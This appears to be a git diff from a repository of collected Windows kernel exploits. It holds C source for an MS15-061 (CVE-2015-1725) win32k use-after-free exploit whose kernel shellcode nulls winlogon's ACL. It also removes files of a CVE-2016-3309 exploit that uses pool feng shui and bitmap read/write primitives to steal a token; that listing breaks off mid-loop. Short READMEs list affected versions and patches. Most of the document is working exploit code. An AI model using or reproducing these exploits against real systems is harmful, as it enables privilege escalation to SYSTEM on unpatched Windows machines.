ULONG pOwner;
BYTE bType;
BYTE bFlags;
WORD wUniq;
}HANDLEENTRY,*PHANDLEENTRY;
typedef struct _SERVERINFO{
DWORD dwSRVIFlags;
DWORD cHandleEntries;
WORD wSRVIFlags;
WORD wRIPPID;
WORD wRIPError;
}SERVERINFO,*PSERVERINFO;
typedef struct _SHAREDINFO{
PSERVERINFO psi;
PHANDLEENTRY aheList;
ULONG HeEntrySize; // Win7 - not present in WinXP?
ULONG_PTR pDispInfo;
ULONG_PTR ulSharedDelta;
ULONG_PTR awmControl; // Not in XP
ULONG_PTR DefWindowMsgs; // Not in XP
ULONG_PTR DefWindowSpecMsgs; // Not in XP
}SHAREDINFO,*PSHAREDINFO;
void* Get__Win32ClientInfo()
{
/*
+0x1d4 GdiTebBatch : _GDI_TEB_BATCH
+0x6b4 RealClientId : _CLIENT_ID
+0x6bc GdiCachedProcessHandle : Ptr32 Void
+0x6c0 GdiClientPID : Uint4B
+0x6c4 GdiClientTID : Uint4B
+0x6c8 GdiThreadLocalInfo : Ptr32 Void
+0x6cc Win32ClientInfo : [62] Uint4B
*/
void* address=NULL;
__asm
{
mov eax,dword ptr fs:[00000018h] // eax=TEB
mov eax,dword ptr [eax+0x6cc] // Win32ClientInfo
mov address,eax;
}
return address;
}
CHAR originalCLS[0x5c+2];
HWND GetKernelHandle(HWND hwnd)
{
HWND kernelWindowHandle;
ULONG i;
HMODULE hUser32;
PSHAREDINFO pSharedInfo;
PSERVERINFO pServerInfo;
HANDLEENTRY *UserHandleTable;
pSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32.dll"), "gSharedInfo");
if (pSharedInfo == NULL)
{
printf("[-] Unable to locate SharedInfo");
return NULL;
} else {
printf("[*] SharedInfo @ %#p\r\n", pSharedInfo);
}
UserHandleTable = pSharedInfo->aheList;
printf("[*] aheList @ %#p\r\n", UserHandleTable);
pServerInfo = pSharedInfo->psi;
printf("[*] pServerInfo @ %#p\r\n", pServerInfo);
printf("[*] Handle Count: %d\r\n", pServerInfo->cHandleEntries);
// printf("User Delta 0x%p\r\n", pSharedInfo->ulSharedDelta); Not used
for(i = 0; i < pServerInfo->cHandleEntries; i++ )
{
__try
{
//
kernelWindowHandle = (HWND)(i | (UserHandleTable[i].wUniq << 0x10));
if( kernelWindowHandle == hwnd )
{
kernelWindowHandle = (HWND)UserHandleTable[i].phead;
printf("[+] Kernel Window Handle found @ %#p\r\n", kernelWindowHandle);
return kernelWindowHandle;
}
}
__except(EXCEPTION_EXECUTE_HANDLER) {}
}
return NULL;
}
VOID ArbDecByOne(DWORD addr){
*(DWORD *)(originalCLS + 0x58) = addr - 0x4;
}
typedef struct _LARGE_UNICODE_STRING {
ULONG Length;
ULONG MaximumLength : 31;
ULONG bAnsi : 1;
PWSTR Buffer;
} LARGE_UNICODE_STRING, *PLARGE_UNICODE_STRING;
VOID RtlInitLargeUnicodeString(
PLARGE_UNICODE_STRING plstr,
LPCWSTR psz,
UINT cchLimit)
{
ULONG Length;
plstr->Buffer = (PWSTR)psz;
plstr->bAnsi = FALSE;
if ( psz!=NULL) {
Length = wcslen( psz ) * sizeof( WCHAR );
plstr->Length = min(Length, cchLimit);
plstr->MaximumLength = min((Length + sizeof(UNICODE_NULL)), cchLimit);
} else {
plstr->MaximumLength = 0;
plstr->Length = 0;
}
}
__declspec(naked) BOOL NTAPI NtUserDefSetText(
IN HWND hwnd,
IN PLARGE_UNICODE_STRING pstrText OPTIONAL
)
{
__asm
{
mov eax, 116Dh
mov edx, 7FFE0300h
call dword ptr [edx]
retn 8
}
}
//the Window Procedure
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
return DefWindowProc(hwnd, msg, wParam, lParam);
}
void* kernelHandle;
__declspec(noinline) int Shellcode()
{
//return MessageBoxA(NULL,"Boom","boom",0);
__asm {
mov eax, kernelHandle // WND - Which window? Check this
mov eax, [eax+8] // THREADINFO
mov eax, [eax] // ETHREAD
mov eax, [eax+0x150] // KPROCESS
mov eax, [eax+0xb8] // flink
procloop:
lea edx, [eax-0xb8] // KPROCESS
mov eax, [eax]
add edx, 0x16c // module name
cmp dword ptr [edx], 0x6c6e6977 // “winl” for winlogon.exe
jne procloop
sub edx, 0x170
mov dword ptr [edx], 0x0 // NULL ACL
}
}
BOOL success = FALSE;
LRESULT CALLBACK WndProc2(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
WORD um=0;
__asm
{
mov ax, cs
mov um, ax
}
if(um == 0x1b)
{
// USER MODE
} else
{
success=TRUE;
DebugBreak();
Shellcode();
}
return DefWindowProc(hwnd, msg, wParam, lParam);
}
HWND Secondhwnd[50];
int SecondWindowIndex=1;
void CreateSecondWindow()
{
WNDCLASSEX wc;
const WCHAR g_szClassName[] = L"SecondClass";
//Step 1: Registering the Window Class
wc.cbSize = sizeof(WNDCLASSEX);
wc.style = 0;
wc.lpfnWndProc = WndProc2;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = NULL;
wc.hIcon = LoadIcon(NULL,IDI_QUESTION);
wc.hCursor = LoadCursor(NULL, IDI_QUESTION);
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wc.lpszMenuName = NULL;
wc.lpszClassName = g_szClassName;
wc.hIconSm = LoadIcon(NULL,IDI_QUESTION);
if(!RegisterClassExW(&wc))
{
return ;
}
for ( int i=0;i<50;i++)
{
Secondhwnd[i] = CreateWindowEx(
WS_EX_CLIENTEDGE,
g_szClassName,
L"The title of my window",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, 240, 120,
NULL, NULL, NULL, NULL);
if(Secondhwnd[i] == NULL)
{
return ;
}
}
}
const WCHAR g_szClassName[] = L"MS15-061";
HWND hwnd;
HINSTANCE hInstance2;
typedef NTSTATUS (NTAPI *pUser32_ClientCopyImage)(PVOID p);
pUser32_ClientCopyImage g_originalCCI;
void* __ClientCopyImageAddress;
NTSTATUS NTAPI hookCCI(PVOID p)
{
LARGE_UNICODE_STRING plstr;
// free WND object
DestroyWindow(hwnd);
UnregisterClassW(g_szClassName,NULL);
/*
.text:BF89EA6D push edx
.text:BF89EA6E call _xxxClientCopyImage@20 ; xxxClientCopyImage(x,x,x,x,x)
.text:BF89EA73 lea esi, [edi+58h] ------->>>> replace edi memeory with NtUserDefSetText
.text:BF89EA76 mov edx, eax
.text:BF89EA78 mov ecx, esi
.text:BF89EA7A call @HMAssignmentLock@8 ; HMAssignmentLock(x,x)
*/
DebugBreak();
RtlInitLargeUnicodeString(&plstr,(WCHAR*)originalCLS, (UINT)-1);
NtUserDefSetText(Secondhwnd[SecondWindowIndex],&plstr);
SecondWindowIndex+=1;
return g_originalCCI(p);
}
void* Get__ClientCopyImageAddressInPEB()
{
void* address=NULL;
__asm
{
mov edx , 0xD8; // 0x36 *4 -> API index *4 number for __ClientCopyImage
mov eax,dword ptr fs:[00000018h] // eax=TEB
mov eax,dword ptr [eax+30h] // EAX=PEB
mov eax,dword ptr [eax+2Ch] // EAX=KernelCallbackTable
add eax,edx
mov address,eax;
int 3
}
return address;
}
void init()
{
DWORD prot;
LoadLibraryA("user32.dll");
CreateSecondWindow();
void* lpvBase = VirtualAlloc(
(void*)0x0c0c0c0c, // System selects address
2048, // Size of allocation
MEM_RESERVE|MEM_COMMIT, // Allocate reserved pages
PAGE_READWRITE); // Protection = no access
/*
for save exit : i used trick like Browser Fake vTable :
allocate 0x0c0c0c0c address and fill tagWND with 0x0c0c0c0c
so every dereference will loop in 0x0c0c0c0c
*/
memset(lpvBase,'\x0c',2048);
memset(originalCLS,0,0x5c+2);
memset(originalCLS,'\x0c',0x5c);
/*
+0x014 bForceMenuDraw : Pos 15, 1 Bit
+0x014 bDialogWindow : Pos 16, 1 Bit
+0x014 bHasCreatestructName : Pos 17, 1 Bit
+0x014 bServerSideWindowProc : Pos 18, 1 Bit
+0x014 bAnsiWindowProc : Pos 19, 1 Bit
*/
kernelHandle=GetKernelHandle(Secondhwnd[0]);
ArbDecByOne((DWORD)kernelHandle+0x14); //
__ClientCopyImageAddress=Get__ClientCopyImageAddressInPEB();
printf("address of __ClientCopyImage is %x \r\n",__ClientCopyImageAddress);
if (!VirtualProtect(__ClientCopyImageAddress, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &prot))
{
return ;
}
g_originalCCI =(pUser32_ClientCopyImage) InterlockedExchangePointer(__ClientCopyImageAddress, &hookCCI);
}
int main()
{
WNDCLASSEX wc;
int x;
MSG Msg;
//Step 1: Registering the Window Class
wc.cbSize = sizeof(WNDCLASSEX);
wc.style = 0;
wc.lpfnWndProc = WndProc;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = NULL;
wc.hIcon = NULL; // bypass check inside xxxSetClassIcon to lead execution path to callback
wc.hCursor = NULL; // bypass check inside xxxSetClassIcon to lead execution path to callback
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wc.lpszMenuName = NULL;
wc.lpszClassName = g_szClassName;
wc.hIconSm = NULL; // bypass "if" inside xxxSetClassIcon to lead execution path to callback
init();
/*
.text:BF91B33C mov edi, [ebp+pclsBase]
..............
..............
.text:BF91B346 mov eax, [edi+58h]
.text:BF91B349 cmp eax, [ebp+arg_8] ; new and old icon must be diffrent
.text:BF91B34C jz loc_BF91B42C ----------->>> we need bypass this
..............
..............
.text:BF91B396 loc_BF91B396: ; CODE XREF: xxxSetClassIcon(x,x,x,x)+68j
.text:BF91B396 lea esi, [edi+58h] ; EDI
.text:BF91B399 mov ecx, esi
.text:BF91B39B mov edx, [ebp+arg_8]
.text:BF91B39E call @HMAssignmentLock@8 ; HMAssignmentLock(x,x)
.text:BF91B3A3 cmp dword ptr [edi+44h], 0
.text:BF91B3A7 jz short loc_BF91B3B4 ---------->>> we need bypass this
.text:BF91B3A9 cmp dword ptr [esi], 0
.text:BF91B3AC jnz short loc_BF91B3B4 ---------->>> we need bypass this
.text:BF91B3AE push edi
.text:BF91B3AF call _xxxCreateClassSmIcon@4 ; xxxCreateClassSmIcon(x)
*/
do
{
if(!RegisterClassExW(&wc))
{
return 0;
}
// Step 2: Creating the Window
hwnd = CreateWindowEx(
WS_EX_CLIENTEDGE,
g_szClassName,
L"The title of my window",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, 240, 120,
NULL, NULL, NULL, NULL);
if(hwnd == NULL)
{
return 0;
}
ShowWindow(hwnd, NULL);
UpdateWindow(hwnd);
//Triger UserMode CallBack
SetClassLongPtr(hwnd, GCLP_HICON, (LONG_PTR)LoadIcon(NULL, IDI_QUESTION));
SendMessageW(Secondhwnd[0], WM_NULL, NULL, NULL);
}while(!success);
}

BIN
TestFailure/CVE-2015-1725/CVE-2015-1725.zip Normal file
View File

Binary file not shown.

8
TestFailure/CVE-2015-1725/README.md
View File

@@ -21,9 +21,15 @@
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1725
```
#### 利用方式
有源码,未知编译方式
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源

42
TestFailure/CVE-2015-1725/README_EN.md Normal file
View File

@@ -0,0 +1,42 @@
### CVE-2015-1725
#### Describe
NT AUTHORITY/SYSTEM
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 7 | | | SP1 | |
| Windows 8 | | | | |
| Windows 8.1 | | | | |
| Windows Rt | | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2003 | | | SP2 | |
| Windows Server 2003 | | R2 | SP2 | |
| Windows Server 2008 | | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1725
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- [Rootkitsmm](https://github.com/Rootkitsmm/MS15-061)
#### Analyse
- https://github.com/LibreCrops/translation-zh_CN/blob/master/source/ms-15-061.rst
- https://translation-zh-cn.readthedocs.io/zh_CN/latest/ms-15-061.html

BIN
TestFailure/CVE-2016-3309/CVE-2016-3309.exe
View File

Binary file not shown.

BIN
TestFailure/CVE-2016-3309/CVE-2016-3309.zip Normal file
View File

Binary file not shown.

BIN
TestFailure/CVE-2016-3309/MS16-098.VC.opendb
View File

Binary file not shown.

28
TestFailure/CVE-2016-3309/MS16-098.sln
View File

@@ -1,28 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MS16-098", "MS16-098.vcxproj", "{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Debug|x64.ActiveCfg = Debug|x64
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Debug|x64.Build.0 = Debug|x64
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Debug|x86.ActiveCfg = Debug|Win32
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Debug|x86.Build.0 = Debug|Win32
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Release|x64.ActiveCfg = Release|x64
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Release|x64.Build.0 = Release|x64
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Release|x86.ActiveCfg = Release|Win32
{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

118
TestFailure/CVE-2016-3309/MS16-098.vcxproj
View File

@@ -1,118 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{DF0232CA-2590-4AD6-9A4C-CDE7DAAB3B6F}</ProjectGuid>
<RootNamespace>MS16098</RootNamespace>
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.c" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

22
TestFailure/CVE-2016-3309/MS16-098.vcxproj.filters
View File

@@ -1,22 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>

4
TestFailure/CVE-2016-3309/MS16-098.vcxproj.user
View File

@@ -1,4 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

2
TestFailure/CVE-2016-3309/README.md
View File

@@ -32,7 +32,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3309
- VS2019V140X64 Release/Debug
暂无测试,测试请移步项目来源看演示
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源

48
TestFailure/CVE-2016-3309/README_EN.md Normal file
View File

@@ -0,0 +1,48 @@
### CVE-2016-3309
#### Describe
The kernel-mode drivers in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability," a different vulnerability than CVE-2016-3309, CVE-2016-3310, and CVE-2016-3311.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 10 | x86/x64 | | | |
| Windows 10 | x86/x64 | 1511 | | |
| Windows 10 | x86/x64 | 1607 | | |
| Windows 7 | x86/x64 | | SP1 | |
| Windows 8.1 | x86/x64 | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | x86/x64 | | SP2 | |
| Windows Server 2008 | x86/x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3309
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- [sensepost](https://github.com/bluefrostsecurity/CVE-2019-1215)
#### Analyse
- https://paper.seebug.org/37/
- https://xz.aliyun.com/t/4543
- https://github.com/55-AA/CVE-2016-3308/blob/master/CVE-2016-3308.md
- https://xz.aliyun.com/t/2919
- https://paper.seebug.org/320/
- https://security.tencent.com/index.php/blog/msg/117
- https://www.anquanke.com/post/id/85302

339
TestFailure/CVE-2016-3309/main.c
View File

@@ -1,339 +0,0 @@
#include <Windows.h>
#include <wingdi.h>
#include <stdio.h>
#include <winddi.h>
#include <time.h>
#include <stdlib.h>
#include <Psapi.h>
HANDLE hWorker, hManager;
BYTE *bits;
//dt nt!_EPROCESS UniqueProcessID ActiveProcessLinks Token
typedef struct
{
DWORD UniqueProcessIdOffset;
DWORD TokenOffset;
} VersionSpecificConfig;
VersionSpecificConfig gConfig = { 0x2e0, 0x348 }; //win 8.1
void AllocateClipBoard(unsigned int size) {
BYTE *buffer;
buffer = malloc(size);
memset(buffer, 0x41, size);
buffer[size - 1] = 0x00;
const size_t len = size;
HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);
memcpy(GlobalLock(hMem), buffer, len);
GlobalUnlock(hMem);
//OpenClipboard(wnd);
//EmptyClipboard();
SetClipboardData(CF_TEXT, hMem);
//CloseClipboard();
GlobalFree(hMem);
}
void AllocateClipBoard2(unsigned int size) {
BYTE *buffer;
buffer = malloc(size);
memset(buffer, 0x41, size);
buffer[size - 1] = 0x00;
const size_t len = size;
HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);
memcpy(GlobalLock(hMem), buffer, len);
GlobalUnlock(hMem);
//OpenClipboard(0);
//EmptyClipboard();
SetClipboardData(CF_TEXT, hMem);
//CloseClipboard();
//GlobalFree(hMem);
}
//https://www-user.tu-chemnitz.de/~heha/petzold/ch14e.htm
// CreateBitmap(7,9,5,3,NULL);
//iWidthBytes = 2 * ((cx*bitsperpixel+15)/16) = 4.5 ~ 4
//iBitmapBits = (cy * cplanes * iWidthBytes = 180
static HBITMAP bitmaps[5000];
void fungshuei() {
HBITMAP bmp;
for (int k = 0; k < 5000; k++) {
//bmp = CreateBitmap(1685, 2, 1, 8, NULL); //800 = 0x8b0 820 = 0x8e0 1730 = 0x1000 1700 = 0xfc0 1670 = 0xf70
bmp = CreateBitmap(1670, 2, 1, 8, NULL); // 1680 = 0xf80 1685 = 0xf90 allocation size 0xfa0
bitmaps[k] = bmp;
}
HACCEL hAccel, hAccel2;
LPACCEL lpAccel;
// Initial setup for pool fengshui.
lpAccel = (LPACCEL)malloc(sizeof(ACCEL));
SecureZeroMemory(lpAccel, sizeof(ACCEL));
HACCEL *pAccels = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
HACCEL *pAccels2 = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
for (INT i = 0; i < 7000; i++) {
hAccel = CreateAcceleratorTableA(lpAccel, 1);
hAccel2 = CreateAcceleratorTableW(lpAccel, 1);
pAccels[i] = hAccel;
pAccels2[i] = hAccel2;
}
for (int k = 0; k < 5000; k++) {
DeleteObject(bitmaps[k]);
}
for (int k = 0; k < 5000; k++) {
//AllocateClipBoard2(0xB90);
CreateEllipticRgn(0x79, 0x79, 1, 1); //size = 0xbc0
}
for (int k = 0; k < 5000; k++) {
//bmp = CreateBitmap(160, 2, 1, 8, NULL); //160 = 0x3a0 real allocation size 0x3b0
//bmp = CreateBitmap(165, 2, 1, 8, NULL); // size 3c0 // 140 = size = 390
bmp = CreateBitmap(0x52, 1, 1, 32, NULL); //size = 3c0
//bmp = CreateBitmap(0x150, 1, 1, 8, NULL); //size = 3c0
//bmp = CreateBitmap(0xa2, 1, 1, 16, NULL); // size = 3c0
bitmaps[k] = bmp;
}
for (int k = 0; k < 1700; k++) { //1500
AllocateClipBoard2(0x30);
}
for (int k = 2000; k < 4000; k++) {
DestroyAcceleratorTable(pAccels[k]);
DestroyAcceleratorTable(pAccels2[k]);
}
}
void SetAddress(BYTE* address) {
for (int i = 0; i < sizeof(address); i++) {
bits[0xdf0 + i] = address[i];
}
SetBitmapBits(hManager, 0x1000, bits);
}
void WriteToAddress(BYTE* data) {
SetBitmapBits(hWorker, sizeof(data), data);
}
LONG ReadFromAddress(ULONG64 src, BYTE* dst, DWORD len) {
SetAddress((BYTE *)&src);
return GetBitmapBits(hWorker, len, dst);
}
// Get base of ntoskrnl.exe
ULONG64 GetNTOsBase()
{
ULONG64 Bases[0x1000];
DWORD needed = 0;
ULONG64 krnlbase = 0;
if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
krnlbase = Bases[0];
}
return krnlbase;
}
// Get EPROCESS for System process
ULONG64 PsInitialSystemProcess()
{
// load ntoskrnl.exe
ULONG64 ntos = (ULONG64)LoadLibrary("ntoskrnl.exe");
// get address of exported PsInitialSystemProcess variable
ULONG64 addr = (ULONG64)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess");
FreeLibrary((HMODULE)ntos);
ULONG64 res = 0;
ULONG64 ntOsBase = GetNTOsBase();
// subtract addr from ntos to get PsInitialSystemProcess offset from base
if (ntOsBase) {
ReadFromAddress(addr - ntos + ntOsBase, (BYTE *)&res, sizeof(ULONG64));
}
return res;
}
// Get EPROCESS for current process
ULONG64 PsGetCurrentProcess()
{
ULONG64 pEPROCESS = PsInitialSystemProcess();// get System EPROCESS
// walk ActiveProcessLinks until we find our Pid
LIST_ENTRY ActiveProcessLinks;
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
ULONG64 res = 0;
while (TRUE) {
ULONG64 UniqueProcessId = 0;
// adjust EPROCESS pointer for next entry
pEPROCESS = (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64);
// get pid
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE *)&UniqueProcessId, sizeof(ULONG64));
// is this our pid?
if (GetCurrentProcessId() == UniqueProcessId) {
res = pEPROCESS;
break;
}
// get next entry
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
// if next same as last, we reached the end
if (pEPROCESS == (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64))
break;
}
return res;
}
void main(int argc, char* argv[]) {
HDC hdc = GetDC(NULL);
HDC hMemDC = CreateCompatibleDC(hdc);
HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL);
HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);
static POINT points[0x3fe01];
for (int l = 0; l < 0x3FE00; l++) {
